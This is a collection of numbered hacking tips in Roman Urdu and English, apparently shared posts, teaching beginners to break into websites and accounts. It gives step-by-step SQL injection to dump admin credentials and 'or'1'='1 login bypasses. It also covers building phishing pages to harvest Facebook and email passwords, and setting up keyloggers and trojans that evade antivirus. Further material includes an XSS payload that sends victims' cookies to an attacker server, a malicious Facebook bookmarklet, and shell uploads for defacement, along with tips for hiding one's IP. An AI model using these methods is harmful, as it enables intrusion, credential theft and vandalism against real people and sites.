0
H-1 Hacking means Get the Admin Rights on any Site and Upload ur Deface.In simple words, You can say that it means Breaking the Security

H-2 Hacking karte waqt in par amal karna!
1) I.p change ya hide krna..
2) Kabi government ki sites ko mat cherna..
3) Agar g0vernment sites ko cherna ha to apne pc se kbi mat cherna! Matlb net cafe se hack krna!
Is k baare mein ager koi question ha to p0cho.. Phr next start karte hain

H-3 While hacking you've to hide your ip in order to defence. Get ip info from www.ip2location.com

H-4 Kuch ehm chzn jo k hacking mein bht Zada help ful hain!
Dorks
Exploits
Deface pages
Shells
Scanner


H-5 JiN Frnz k Pas NeT Availble hai or Web HckinG Mai Intrestd hain. Wo Facebok pe Group join kren.
Pakistan Urduhack security team


H-6 pc 2 securty haking
www. madleets .com
www.code.box.sk
www.rootshell.com
www.cyberarmy.com
www.search.cai.com
www.xforce.iss.net
www.infowar.com
www.codes.ing.com

H-7 Learn hacking and internet security (id hacking, google hacking, wifi hacking, IP hacking, keylogging) e.t.c by Visiting Www.itshine.tk

 H-8
For hacking turorials:
1.http://adf.ly/Zmk76
2.http://adf.ly/ZmkBk
3.http://adf.ly/ZmkIT
4.http://adf.ly/ZmkNx
5. http://adf.ly/ZmkVP

H-9 Agr ap hacking knowledge hasil krna ha to visit with detail
www.hack.co.za
www.rootabega.org
www.rootshell.com
www.insecure.org/sploits

H-10 Just jo web hck krte ho us ka link whan ja k notify k tab mai ja k dy do apne nam se ya ksi or k nam se. . But naam cnfrm kr lena tmary nam ka agr whan alrdy koi ho to tmari sites b us k hsy mai jain gi. . . Us ka rank bry ga

H-11 Is k lye manual meth0d b hai aur kuch softwarez b hain! Manual meth0d se zada tar i.p trace ho jata ha! Aur softwarez se ni h0ta!

 H-12
Jis website ko hack karne he us k last me admin/login.php likho.
 jese facebook.com/admin/login.php
Aur
Username: admin
Pswrd:
'or"='
('or"=') ye posword he try it now.

 H-13 'or"=' ye SQLI ki basic ha web ki programing ka fault ha or yo ha 'or'1'='1 basically query run ho rahi ha ya ek true statement ha so login ho jahy ga.


 p-14.0 MagicPs 1.5 Jst for Yahoo id and paswrd stealing. Dwnload it frm 4shared.com Before using it disable ur anti virus. . kiu k ye ek Trojan hai.AntiVirus isy detect krta hai as a VIRUS or delete mar daita hai.....
_ye software Instal kro ye ek chota sa trojan soft hai. Sb setting kro us mai. eg apni yaho id type kro js pe wo paswrd snd kre ga. file name select kro pic exe rar koi file type select kro. Fake eror koi selectr kr k. Create mps pe click kr do.

 H-14 Instal kro ye ek chota sa trojan soft hai. Sb setting kro us mai. eg apni yaho id type kro js pe wo paswrd snd kre ga. file name select kro pic exe rar koi file type select kro. Fake eror koi selectr kr k. Create mps pe click kr do.

H-15 Targets ko leke hack krna to CEH k lye b 60% chances h0te hen btw if i try 20% chances hoskte hen. Or me g00gle index query he use krta hu btw aksar scannerz use krta hu. Or hacking k lye u mst knw bout c0mplete sql injection... Wo b Manually ..  site ko hack krte waqt week point h uske security or b kch wholes means weak point h0te hen

H-16 Guest. . Ya user acount ma cmd open kr k Type kren. Net User Administrator asdfg Enter kr den. Asd paswrd lag jai ga. Admin ka paswrd. . Ya Run mai type kren. Lusrmgr.msc or yhan se paswrd set kren. .

 H-17 I.p Matlb Internet protoc0l..
Har Internet connection ka i.p hota ha jis se ap ki p0siti0n ko trace kia ja skta ha! Wo kuch is tarhan k h0te hain
192.168.1.1 etc

 H-18 Jo web vub gi usi ma login ho ga / chracter use karny say ya vub khatam ho jata ha or hr web ma admin bi ni hota.

 H-19 Site hack kr k har hacker Miror ki boht si sites hain un mai ksi pe b hckd site ka miror dy dta hai. . . Yhan har hckr ka sara record hota hai. . Mai ne jhan ki ranking btai wo Mirror.sec-t.net web hai. . .

 H-20 Free Program For Hack Password:
http://www.mediafire.com/?dncqqjpe3r5pz3s
Its 100% Working

H-21 One of best software 4 cracking is ws32dsm if u want 2 learn cracking then visit astatalk.com

H-22
www.Hackerbradri.Net
 Download Hacking E-Book Name Of Book Is Google Hacks,
Web Hacking Through Google in Urdu Edition

 H-23 Sony: Hacker stole PlayStation users' personal info http://on.cnn.com/gxgr7k

H-24 Hacking Tip: Hacking ke liye aik software use hota hai us software ka naam hai "magicps.1.5" search Link: www.4shared.com

H-25 For hacking a web u will need.
1. sql helper v 2.7
2. exploit scanner
3. Havij for admin finder and Md5
4. Dorks

H-26 There R 5 Methods of Hacking Email IDs:
Fake Login Pages-
Cookie Stealing-
Social Engineering-
Brute Forcing-
Trojans or Keyloggers.
And Once More u can ask the paswrd frm the ownr of that id!

H-27 Email Hacking by Software:
Email Hacking k liye ek Software use hoti hai jo Internet se purchase karni hoti hai. Is mein zyada tar fraud hota hai. Aksar Softwares work karti hain aur aksar nahi.

H-28 Email Hcking by Cracking:
Is k lie b ek Software use hoti ha.Is Software me Victim ki Id rkhni hoti ha or kuch Paswrds hote hn.Id r Paswrd is Software me rkh kr Crack krni hoti hn.Ye method thora mushkil hota ha jiski wja se aksr Hackrz is Software se Hack ni kr skte

 H-29 Email Hacking by Fake Pages:
Ye ek page hota hai jo kisi victim ko dhoka dene k liye banaya jata hai ya bana banaya Download kya jata hai. Ye sub se easy method hai Email Hacking ka

 H-30 *Hacking*  
1.Arbitary File Deletion
2.Code Execution.
3.Cookie Manipulation
4.CRLF Injection
5.Cross Frame Scripting (XFS)
6.Cross Site Scripting (xss)
7.Directory Traversal
8.Email Injection.
9.File inclusion.
10.Full path Disclosure.
11.LDAP injection.
12.PHP code Injection
13.Remote XsL inclusion.
14.SSI injection
15.SQL injection
16.URL Redirection
17.xPath Injection.
18.CSRF
19.LFI
20.RFI

H-31
Common Web Hacking Methods.
1. Cross Site Scripting (xss) 2. Cross Site Request Forgery (CSRF)
3. Click jacking
4. Gifar 5.
Url Fram injection
6. SQL injection
7. Local file Inclusion (LFI)
8. Remote file inclusion (RFI)

H-32 Hacking ki kuch terms use h0ti hain!
Jaise:
"N0obs" matlb k begineer hai.. Jo bunda abi begineer ho new new hacking sekh raha ho..
2) "Vulnubrle" matlb jo site hack ho ske..

 H-33 Hacking meth0ds Ye Hain:
XSS
DNN
RFI
LFI
SQL INJECTI0N
IIS
ROOTING
BYPASS L0GIN
Rooting ki agey bohat types hain!

H-34 How To Hack A Yahoo Messenger's Password ?
Th3r3 A Lot Of Ways
1:with Mps Jo Easy hai.
2:with Keylogger ,sa App Facebook,Msn etc b hack kar sakta ho.
3: fake page Hai isi sa app B yahoo,facebook,msn etc hack kar sakta ho lakin sub k Fake page different hai

 H-35
> Ye nishan jhan hai whan just enter pres krna hai ye type na kr dna >
4. . 5 lines hain. Words daikh lo case sensitive hai. Jese whan likhe hn same usi tara capital smal leter use krne hn. .

 H-36 AGR Ap kisi ka B(Facebok,yaho)Acount Hack krna Chahty ha To Downlod This Software"LOGIN SPOOFER"Make Fake Pages & Hack 0ther's Account

H-37
P1
Keylogger na to koi Software hota ha or na hi koi Virus.Balke ye Tool hota ha jis se ap apna Virus bnate hn.Ye Virus ap Victim ko bhejte hn.Is pr Click krty hi ye Victim k press hone wale Keys ko save kr k ap tk puhunchata ha.
Ardamax Keylogger sb se best ha.Is me ap Victim k Screen Shots b hasil kr skte hn.Keylogger se Virus bnate huwe apko kisi Web Hosting ka Username or Password dena ha,Jahan pr apke Victim k Passwords save hote jaenge.Byethost.com best ha Keylogging k liye.Yahan apna Account bnaen or Vista Panel me login ho jaen.Samne right side pr apka Ftp Username show ho rha hoga.Ye Ardamax me Virus bnate huwe Copy Paste kr den

H-38
P2
Aap Tutorial, Video aur Ardamax yahan se Download kar sakte hain:
http://tinyurl.com/h4ckerkey
Ardamax mein Hosting ki details dene k baad Ok karen. Virus Ready. Ab is ko Crypter mein daal kar (Ye Keylogger k saath download karen) Virus ka Icon change kar k koi Image bana len, taake Victim ko shak na ho. Aur jab Victim is par Click kar k Open karega to uska Pc gaya....
-----EnD-----

H-39
keylogger Software se Yaho Facebook Msn Hotmail gmail Sb idz hack ki ja skti hain. .
Keyloger boht se hain.
Ardamax keyloger
Perfect keyloger
Stealth keyloger
Silent keyloger Etc. .
Sb k use krne ka method same hai. Ak Trojan file create krte hn. Usy koi b icon dy kr ksi b extention (.dat .avi .jgp .exe) mai cnvrt kr k us file ko mail kr diya jata hai js ki id hck krni ho. Agr wo bnda wo file pic, open kr le.
To wo keybord ki jo b key pres kre ga wo ap ko mail mai mile ga. Us k sb pwd mil jain ge. Us k pc ki screen print. Pics b


H-40 Pc keyloger se nai Trojan se hack krte hain. loger se to jst Keybrd k key log hote hn or Prntscren le skte hn etc. or Trojan se kafi control ajata hai. is wqt Pro Rat Trojan he zyada use hony wala Trojan hai. Tutorial Hito k Blog pe mil jai ga. funvirus.tk

H-41 Keylogger : Keylogger Ek Software Hai Jo www.Itshine.tk Mai B Hai Ya Google sa Find karo Isi download karo Our Ek Torjan File Banao Our Isi File Ko send karo isi O Jitna b Keys press kara gay Keyboard k O sub save ho kar app k email kar day gay... Next hai fake page.

H-42
Fake page se hacking karne ko phising kehte hain!

H-43
P1
today i will sharing hw 2 make fakepage of any web so first of all open web i.e facebook.com then right cick n go 2 option view source or

H-44
P2 open source depend upon ur browser nw u hv a html script nw select all (ctrl+a)then copy it (ctrl+c) then open a notepad and past(ctrl+v)

H-45
P3
it there n save(ctrl+s) it as index.html nw in notepad find (ctrl+f) and action nw u will get an address in "" just remove that address and past

H-46
P4
pass.php download a little php script 4rm tinyurl.com/fakephp open it in notepad u will find web address change it 2 redirect web i.e facebook.com

H-47
P5
Now upload these files 2 free hosting web like 110mb.com, 00abiz.com, my-php.net ect there in ftp u will find a folder go in it then there

H-48
P6
there u will find index.html replace it 2 ur files u cn also upload more fake pages by creating new direction i.e facebook, yahoo
  *end*

H-49 YAHOO ID password and ID stealing k liye MagicPs 1.5 Ya MPS ++ Down load kren. Its a trojan use it at ur own risk. www.ITshine.tk

H-50 Create mps se wo ek file create kre ga js ko ap ne zip, rar mai rakh k us id pe mail krna hai js ki id hck krni hai. Agr wo usy open kr leta hai. Pictr smj k to us ki id, paswrd tmari id pe recive ho jai gi by mail


H-51
Magic++ (Mps) App Www.ITshine.tk Sa Download Karo our Open karo Ek Torjan File Banao Isi K Bad O File isi ko send karo kis k Yahoo K pass hack karna hai ok Jab o open kara gay isi K PassWord app k Pass and enjoy

H-52 MagicPs 1.5 Jst for Yahoo id and paswrd stealing. Dwnload it frm 4shared.com Before using it disable ur anti virus. . kiu k ye ek Trojan hai. Anti

H-53 Instal kro ye ek chota sa trojan soft hai. Sb setting kro us mai. eg apni yaho id type kro js pe wo paswrd snd kre ga. file name select kro pic exe rar koi file type select kro. Fake eror koi selectr kr k. Create mps pe click kr do.

H-54 Create mps se wo ek file create kre ga js ko ap ne zip, rar mai rakh k us id pe mail krna hai js ki id hck krni hai. Agr wo usy open kr leta hai. Pictr smj k to us ki id, paswrd tmari id pe recive ho jai gi by mail

H-55 guys jo bhe newbie hacker hen they must learn xss tunneling


H-56 XSS Tunneling: Complete Tutorial
www.facebook.com/topic.php

H-57 acuntex scanner download kren,wo batadeta ha k site ks method se h4ck hoskti ha

H-58 Change the default location 4 installing programs go 2 run n type regedit hkey_local_machine?/software?/microsoft?/windows?/currentversion nw in right site find c:?/program files change it

H-59 Refrl wali site me apne target ka email qabo kro phr usky mail me Fake page ka link send kr k uska email aur pasword hasil kro

H-60
1.
Keyloger ki setting kr k by email victim ko bhejo.
2.
Linux ki ek ek site alag alag deface krni hoti ha

H-61
Ab HaCkiNg SekhiUrdu Main , Free HaCking SofTwAre DownLoAd KarEn, HaCkiNg SoftWaRe Kexe Use Hote Hain, SaFety TiPs , HaCking RulEs , HaCkiNg HeLpFul LiNks Or Bhi BuHuT KuCh JaniYe HaCkiNg Ke Bare MaiN Wo Bhi SuB Urdu Main Visit Karen www.sherazhackz.tk

H-62
P1
Download Prorat. After its downloading, Right Click on the Folder and choose Drive to extract. Now we will create the actual Trojan file. Click on Create and choose Create Prorat Server. Now enter your Ip Address so that Server could Connect to you.

H-63
P2
If u dont know your Ip Address, Click on little arrow to have it filled automatically. Now put your Email so that when a Victim gets infected, it will send u a Message. We will not be using the rest of the Options.
-----EnD-----

H-64
H-62 and H-63 is Prorat Trojan Tutorial.

H-65 ye info galat h.K linux ke ek ek site alag alag deface karne hoti hyn.Ap server root kar k sb site ko script ya to0l se mass deface kartae ho

H-66 Server Hacking:
Server Hacking k liye ek Software bhi use hotay hain. Ye ek normal file (mp3, pic) ko ek Hacking file mein convert kar deti hai. Jab is file ki setting us Software k through mukammal ho jati hai to usy kisi Victim ko send karna hota hai. Jab wo User us file ko open karta hai to us ki Information aapki Id par mail hoti hain.

H-67 Facebook Password Hack karne k liye Emissary Keylogger use karen. Download from http://pcguru.tk
Ye victim k pc ki screen shots le kar aapki mail id par send karta hai. Is k liye aap k paas Microsoft FrameWork.net Software install hona chahiye. Download from:
Www.microsoft.com/net/
:
H-68 For Msn Hacking Download (Hotmailhack Faqs v1.0)
Our Windows Hacking.
(Win hacker 2.03) download karo.our
(Win Secure)
:
H-69
H-66 'server hacking'
these are called binderz. . . . .
Massive arc kafi acha ha.

H-70 Yahoo Hacking K Laha Download(Trojan Maker)r(Mps)(Bus Hack) r
(Deep Throat Trojan).Or Net Hacking K Laha (Download Net Hack 3.4.2)

H-71
yahoo hacking tip
P1)yah00 id hack krni h t0 dwnlod"MagicPS"open kr0 j0 disable tskmngr,regedit,cmd send ip yah00 paswd etc k0 select kren

H-72
p2)phr ic0n jpg wala aur nam mn lagend.jpg lekh k creat mps pe clck krn phr j0 file bane ki zip f0ldr m dal k us ki id pe phank den (next)


H-73
p3)create mps se phla id mn apne apni id lekhni h jis pe tr0jan apk0 paswd mail kr dy ga.. .k0i binder le k s soomro.jpg k0 ksi(next)

H-74
p4 aur file se bind kr k zip mn dalny se antivirus tr0jan(Makhdoom.jpg) k0 na pakr saky ga. *End*


H-75 yahoo id ka pasword hack karne k liye cookies section ka itamal kia jata hy. Esliye cookies ko wash kr dia krein hack nhe hogi id

H-76
Yahoo id ko hack krny k liye fake page r logger k ilawa ye method use hoty hn c00kie stealing...cracking+ pass reset exploit tha jo ab work nhn krta

H-77 Email hacking k lye ap ko victim ki id or password pata hoto aram se hack ho jati he.


H-78
P1 There are these methods of Email Hacking. . .
1- Fake Login Pages
2- Cookie Stealing
3- Social Engeenering
4- Brute Forcing
5- Trojan (Rat= Remote Administration Tools)
6- Keyloggers & Cracking

H-79 P2 We will use Fake Page for Email Hacking. . . This is a Page which is made for Victim or downloaded. . .
Q- How to use fake page? . . .
Ans- This is a page. .This page is sent to victim.
When user opens this page link,His information and password etc is sent to ur Hosting account
H-80 P3 When u download fake page, You will have to upload this on any Hosting account . . . Like T35.com . . . Then this site will give u link . . . Now u have to send this link to victim's Id . . . Whenever victim opens this link, His/Her info & password will be in ur Hosting account . . . To download Fake page, Visit:
Www.HackMeOut.blogspot.com
-------EnD--------

H-81 Email any id by using Ardramax Keylogger.

H-82
P1 T0pic: H0w 2 use ur own's pc or ur 4nds pc 4nd anywhere!

H-83
P2: First of all open this site www.secure.logmein.com and make a acount and sign in..

H-84
P3: After signing there is opti0n 2 "Add This Computer".. Click on this.. After that signout.. N0w if u wanna use ur pc 4m anywhere..

H-85
P4: The cnditi0n is this that ur pc should b on.. N0w sign in 2 ur logmein acount 4m anywhere use ur pc if ur pc is on....

H-86
P5: Similarly u can try the same trick wd ur 4nd's pc.. Just use ur 4nds pc and sign in 2 ur logmein's acount and add ur 4nds pc too

H-87
P6:  And use ur 4nds pc 4m anywhere requiring 1 c0nditi0n that the pc is on. U can add 5 pc 4m 1 acount... END..
A trick by www.itdosti.com

H-88
P1 How To Hack Ur Friends Computer Using Website ?
1st Open Www.Logmein.com And Make A Account And After That Sign In Ho kar Sign Ho jaho !

H-89
P2 Per Apna Dost Ya Net Cafe Jay k visit Www.Logmein.com Again and Open Ur Account And Click On Add This Computer And Add that Computer ok app 5 Computer Add kar sakta ho

H-90
P3 Our Per Apna Computer Open kar K Per Sa Apna Account open karo Our Jab app k dost Online Ho jaha isi k Computer Show Ho jaha gay k online ha and Use it.. Enjoy
---END--

H-91 Jin .php .asp webs mai Sql eror paya jata hai unhe sql injection se hack keya jata hai ye without soft tools hack ho skti hain par asaani k lye eror webs finding k lye Havij software use keya jata hai.


H-92 Online Sql Injection Tools:
Killer.blackapplehost.com
Revtan.site40.net
Kerinci.net
Kinginfect.net

H-93 Some Sql Injection Methods:
Time base sqli
Sqli by finding valid columns
Blind folded sqli
Sqli by load file injection

H-94 Aap Scanners se Sql Site Hack karne k liye Vulnerabilities find kar sakte hain. In mein Exploit aur Accunetix Scanner shamil hain. Accunetix har kism ki Vulnerability find karta hai agar register ho, warna just Xss find karega. You can download from:
Www.Accunetix.co/websitesecurity/sqlinjection
For more Hacking Info, Stay with us.

H-95
HACKING CLASS NO. "1"
1- SQL INJECTION HACKING
Sab se Pehle Ap Www.Google.Com
Open Karen
Search Bar Mein Likhen
Inurl:adminlogin.asp
Jo Web Results Ayen ge Us Mein Se Jis Web k Admin Page Pe Ap Login Hona Chahte Hen Usko Open Karen
Username
1'or'1'='1
Password
1'or'1='1
Likh K Login Ho Jayen
Ab Ap Admin Panel Mein Enter Ho Jayen ge
Is Method Ko Test Karne k Liye Ye Link Visit Karen

H-96
SQLI se admin page me name and password k bd login ho gae phr web me editing ks terhan krte hen.C next

H-97
wo admin ki permision par ha, agar admin privilige ziada hen to tm full edit krskte ho.. Web ka c0ntent knsa ha? J00mla, wp,mgento, ya kch or?

H-98
P1
Sql injection is a web hacking method. We use some dorks in this method. Like:
inurl:id=5
Search this in Google. Then open any web. The web will be something like this:
Www.Site.com/index.php?id=5
Then we will check that it is vulnerable (Hackable) or not. We will put ' after 5. Like:
Www.site.com/index.php?id=5'
If you get an syntax error, then it is vulnerable.

H-99
P2
Now, we will find its valid columns. Put:
index.php?id=5 order by 1--
Keep checking untill u get an error. If you get an error in 6, then it has 5 columns. Now:
index.php?id=-5 union all select 1,2,3,4,5--
You will get valid column. Suppose that 4th is valid. Now find version of database.
index.php?id=5 union all select 1,2,3,@@version,5--

H-100
P3
If version is 5,u can directly find table's names.Bt if version is 4,u'll have to guess table's names. Suppose if verson is 5.1.23 (5),then find tables like this:
index.php?id=5 union all select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--

H-101
P4
You will get table's name. Now find columns:
index.php?id=5 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=char()
Now final step. Find admin id, username and pass.
index.php?id=5 union all select 1,2,3,group_concat(username,0x3a,pass) from admins--
****Finish****

H-102 P1
H0w to hack website? H0w to be a g0od hacker? Bhot se methods hen website hacking k. But m0st p0pular ix SQL injection, xss-c00kie


H-103 P2. Shelling a site via sqli...jesy koi bhe site hack ki via sqli to hmare pas admin passwrd h0ga, to us s l0gin hojayen. Then try to find the option having names,


H-104
P.1  Some Questions about shells and Hacking softwares:
Yar rootes aur shell kia hota hai. Ap ip hide kelye konsi web ya sofware use krty hain. Apka favorite haking tool konsa hai. Target sites ko hak krny ka best method konsa hai. Aur ap google index query use krty hain ya target site pr he attack krty hain. Haking kelye Sql Ka knowledge zarori hai ya kam chal jai ga. Site ko hak krty waqat ap uska konsa weak point search krty hain.

H-105
P2: shell basically hm web ka control use krne k lie use krte han,ye ziada tr php nd asp format me hote han

H-106
P3: Dnn krte wqt aapko shll ko jpg me cnvrt krna prta ha,ise shell pe koi asr ni hota

H-107
P4: in short shell ak Php ya asp script hai jse ham web mai upload kr dty hain. . Or wo hamy web pe control dta hai. Us shell k zariye ham apna deface page upload krte hn, ,
C99.php r59.php

H-108
P5: shell php coding se notepad me hi banta ha,bt hm bane banae use krte han,shell ksi site pe upload krne se hamarey paas site ka full control ajata ha,phr hm us pe deface page uploadkrskte han,

H-109
P6: shells bht saarey hote han,common c99 or r57 ha,shells hm dnn rfi me commonly use krte han,

H-110
P7 Q.Shell upload website k kis hisy ma hoty hn?
Ek Example Ha Gogle Ma Ap Likho C99.php Pr search kro Same to Same Shell ha Isi Open kr k Dakho

H-111
P8: shells websites par upl0ad krne k bad web par full access milti ha shells bh0t se languages me mil skte hen. Php,asp,aspx,perl,cgi,jsp me ye smjho bad programing language use ki jati ha isme.

H-112
P9:u can get free shells 4rm these sites.
Sdf.lonestar.org cyberspace.org
Grex.org
Nxy.net
Shellyeah.org
Hobbiton.org
Freeshells.net
Ductape.net
Free.net.pl
.xox.pl
Iprotection.com
Coronus.com
Odd.org
Marmoset.net
Flame.org
Freeshells.net.pk
Linuxshell.org
Takiweb.com
Rootshell.be

H-113
P10: websites of shell
Getshell.Com
shell4u.Com
hacktools.Com

H-114
P11: u can get free shells 4rm these sites.
Sdf.lonestar.org cyberspace.org
Grex.org
Nxy.net
Shellyeah.org
Hobbiton.org
Freeshells.net
Ductape.net
Free.net.pl
.xox.pl
Iprotection.com
Coronus.com
Odd.org
Marmoset.net
Flame.org
Freeshells.net.pk
Linuxshell.org
Takiweb.com
Rootshell.be

H-115
P1
I m g0ing 2 give u l3ctur3 on fb acount hacking thr0ugh fake pages.. This is a d3tailed l3cture wd headingss and Questi0ns!
  C Next!

H-116
P2.. Ab atey hai is fake page ki construction ki taraf..
Constructi0n:
Facebook Fake page d0wnload kro g00gle se.. Easily mil jaye  ga.. Phr is fake page ko upload kro.. Ab questi0n ye h0ta ha k upload kahan kren?
Answ3r:
Kisi b free webhosting site 4xample 000a.biz
110mb.com
IN MEin acnt bnao.. Aur ftp server mein jao..
Wahan par index name ki file h0 gi..
   c Next

H-117
P3
Us index file ko replace kro apne fake page se.L0 gi apka fake page h0 gya tyar
N0w questi0n Arise k
Ab Isko use kaise krna ha.??

H-118
P4!
H0w 2 use Fb Fake Page!
JB ap free h0sting mein apni site bnao ge..
To jo site link ho ga wo apne victim ko send krna ha.. Agar wo fake page se waqif na hua to wo us mein l0gin kre ga aur uska id and pass ap k pass aa jaye ga..
Victim: Jis ka acount hack krna ha..
N0w questi0n arise k hamein wo pass and i.d kahan se mile ga!
    C next..!

H-119
P5! Fr0m where u will get the victims paswrd and id??
ANSWER:
Jahan per ap fb fake page rakho ge agar victim ne l0gin kia ho to wahan par pass.txt k name se file buni ho gi.. Usmein victim ka id and paswrd ho ga...
.....THE END......

H-120
P2!
Fb ki acount hacking thr0ugh fake page h0 skti ha..!
Introducti0n:
Is fake page k zarye hum fb ka acount hack kr skte.. Ye same 2 same facebook l0gin jaisa page h0ga.. Aur kisi ko shak b ni ho ga..
  C Next.....

H-121
P1
How 2 hack fb fanpage 1st of all download fb exploit 4rm tinyurl.com/5vp9lno
then edit it get notepad++ u cn d.l it 4rm notepad-plus-plus.org/download
open the file name pagehack.js with notepad++ n find wamiqali@hungry-hackers.com by ctrl+f and replace it with ur own email id which hv

H-122
PG2 Fb account nw u hv 2 change the viral text which will be send 2 the friends of victum 2 do this find the text hey see what i got! and replace it with ur own text. this text will sent 2 the fb wall of 15 friends of victum it is autoposting bot to prevent fb from blocking

H-123
PG3 now u have to upload this script to your server 4 this make ur account on 0fess.net nw after uploading ur script ur site will become ursite.0fess.net/booster.js nw u need 2 convince the admin of that fane page to put following code javascript:(a = (b = document).createElement("script")).scr="//www.ursite.0fess.net/booster.js", b.body.appendChild(a);
void(0)
note replace ur web link in above javascript.End

H-124
How 2 make file undetectable using winrar: we will bind 2 files using rar highlight both files n then go 2 add to achive change the name and select "create sfx options" go2 advanced at the top and click on sfx options in the general tab type the name of file u want 2 run after extraction go2 modes tab and select hide all go2 the text and icon tab and change the icone click ok on the advanced windows and ok in main window n enjoy

H-125
P1
Xss kay script hoty ha bus wo url ma web gay agy lagty jaho or dnn ma ek url or ek java script use hota ha bus.

H-126
P2
What is Cross Site Scripting (XSS)?
Cross Site Scripting allows you to insert a malicous code into a web application. (almost with a javascript code, but it is also possible to insert other codes like PHP or HTML.
It is a vulnerability which is on almost every website you can find on the WWW.
In addition I will talk about 2 different ways to use XSS...
1. The attacker will include a code into a URL. The XSS will not stay on the page.
2. The attacker will be able to insert a code and it will stay on the website. Usually the attacker will choose a website with some "input fields", like shoutboxes, blogs and guestbooks

H-127
P3
Finding XSS vulnerabilities
1.Visit http://www.google.com
2.Use"google dorks",like search.php?q=
3.Found the "right" website to inject it

H-128
P4:
The Basics of XSS
A common used Cross Site Scripting injection is the following javascript code:
Code:
<script>alert("something")</script>
If u execute it, it will popup a message box which will say "something".
Soooo, if you have found a vuln website you could test if it is vuln to XSS.
Just look:
Code:
http://database.delete.com/search.php?q=<script>alert("something")</script>
That was a example for a javascript based XSS.

H-129
P5: But as I told you before, javascript isn't the only type of code you could use to execute a XSS.
Here is a example for a HTML injection:
Code:
<br><br><b><u>something</u></b>
Will look like:
Code:
http://database.delete.com/search.php?q=<br><br><b><u>something</u></b>
You should see a bold text on the page, if the page is vulnerable to XSS.

H-130
P6
Defacment with XSS
To deface a website with Cross Site Scripting (XSS) you could use the following codes:
Code:
<IMG SRC="http://mywebsite.com/defacmentpic.jpg">
= will include a image

Code:
<EMBED SRC="http://mywebsite.com/deface.swf"
= will include a flash video

Code:
<embed src="deface.mid" hidden autostart="true" loop="false" />
= will include a music file in hidden mode

Code:
<script>window.open( "http://www.hackforums.net/" )</script>
= will redirect you to another website, in this case "hackforums.net"

H-131
P7
Stealing Cookies using XSS
The most used method of XSS is the cookie stealing.
First get a cookielogger.php (will attach it!)
Okay, now we have the cookielogger.php. Upload it to your server and also create a log.txt where your logs will be stored.
Make sure that it works!

H-132
P8:
Search a vuln website and insert following code:
(replace it with your information)

Code:
document.location = "http://myserver.com/cookielogger.php?c="+document.cookie
Now, if the user visit the website his cookies will be stolen and sent to your cookielogger.
Analyze the logger for his cookies and hijack his session.

H-133
P9:
But what is if the website hasn't a such store function?
See...
Code:
http://website.com/search.php?q=document.location = "http://myserver.com/cookielogger.php?c="+document.cookie

H-134
P10:
You will redirect the original website to your server.
(you should "crypt" the URL string, because your victim could notice the malicious code included to the original URL)

But how "crypt" this code to become "normal", so that your victim don't notice the redirect to your server?

Easy...all you need is a String to ASCII Converter and the function char()
( http://www.easycalculation.com/ascii-hex.php )

H-135
P11:
Okay, now pick your javascript code and convert it to ASCII.
Example:
Code:
<script>alert("Example")</script>
is equal
Code:
60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62

H-136
P12
Now,your browser only could read the code if there is a comma between the digits.Like this:
Code:
60,115,99,114,105, ?<...?>
Finished! You crypted your malicious code to a "hidden" malicious code :D!
Bypassing Filters

H-137
P13:
But what we could do, if a webadmin has blocked some characters?
Hm, we need to find another method...just write the code in a different way.
Code:
<script>alert("Example")</script>
would be
Code:
')alert("Example");
Code:
')alert('Example');
Code:
")alert("Example");
?<...?> continue that to find a way :)
Yeah,that is it.
# Finish #

H-138
P1:
Abbreviations
(IIS) Internet Information Services
(PHP) PHP Hypertext Preprocessor
(DNN) DotNetNuke
kuch zorar abbrevitiati0n jo lacture mea use h0ty hn
malik_saab:

H-139
P2:
Dnn dotnetnuke ek web application ha. Jst like j00mla,w0rdpress,vbulletin... But ye sirf iis par h0st ki jati ha

H-140
P3:
How to install DotNetNuke 4.5 to Windows XP Pro with IIS Video tutorial, how to install DotNetNuke 4.5 to a bare bones installation of Windows XP
Professional. www.dnncreative.com/


H-141
P4
How to Hack a site by Dnn?
Sub se pehle karna ye hai k google mein ye dork search karen:
inurl:"/portals/0" site:.com

H-142
P5
Phir jo sites hongi wo esi hongi:
www.bo0m.com/portals/0/
Isko kholen.

H-143
P6
Us site k url mein portals/0 ki jaga ye likhen:
providers/htmleditorproviders/fck/fcklinkgallery.aspx
Phir site esi hogi www.bo0m.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx

H-144
P7
Phir agar aap k paas box bana ata hai us mein likha hoga:
"Files on your site"
Uspe click kren. Phir ye java code url ko mita k daalen:
javascript:_dopostback('ctlurl$cmdupload',")

H-145
P8
Us k baad upload ki option ajaega. Phir upload karden apna shell ya deface. Is mein html upload nahi ho sakti. Jpg hoti hai only.End


H-146
P1:
Dork link hotae hain special web k.Tm koi b dork google mai dalo phr buhat web i ge.Koi b select karo aur url k akr mai number k bd ' dal.Agar mysql not respond jaisa eror iya tou web hack ho sakti hy.Then colum n0 pta kar colum 1-- lik kar.Phr union maloom kar.2 step aur hain phr web hack.Pouch le apne hacker se.Yae msg 4wd kar k.

H-147
P2
Dorks for webdav: ,,"inurl:.com/webdav/"
Isi tarah agr India ki chahiye ho to:
inurl:.in/webdav/
Ye dorks Google me search krn

H-148
P3
Us k baad site aisi hogi:
www.site.com/webdav/hj
Apne krna ye hai k is site ko copy karen:
www.site.com/webdav/
Aur my computer kholen

H-149
P4
Aapse username or pass maangega. Default username wampp and pass xampp hai. Ye daal k ok karen or us site ka name h4cked rakhden and finish pe click karen. Phir agar deface page dalna ha to u.h.html ko copy kr k us folder me paste kren

H-150
P5
Agar shell daalna ho to shell.php ko copy kr k us folder me paste krden. Agar apna deface page dekhna ho to
www.site.com/webdav/u.h.html
Aur agar apna shell kholna ho to
www.site.com/webdav/shell.php
----Finish---

H-151 Salam frndz. I m going to  share rfi web access method.


H-152
P1 rfi vulnerable sites ko serch krne k lie gogle me Rfi dorks likho.Phr jo sites ayegi wo kuch is trah hogi
Www.site.com/index.php?action=

H-153
P2
Us site ki vul search karne k liye=sign k aagy Www.google.com likhen.
Phir url kuch aisi banegi:
www.abc.com/index.php?action=www.google.com
Is url se agr google ka main page khulta ha to ye site Rfi vul ha

H-154
P3
Phir ye krna hai k kisi webhosting like t35.com ya 110mb.com pe c99 ya r75 shell upload kren.

H-155
P4
Ab ye karen k site mein jaha aapne Google ka link dia tha, Waha ab apne shell ka link den.

H-156
P5
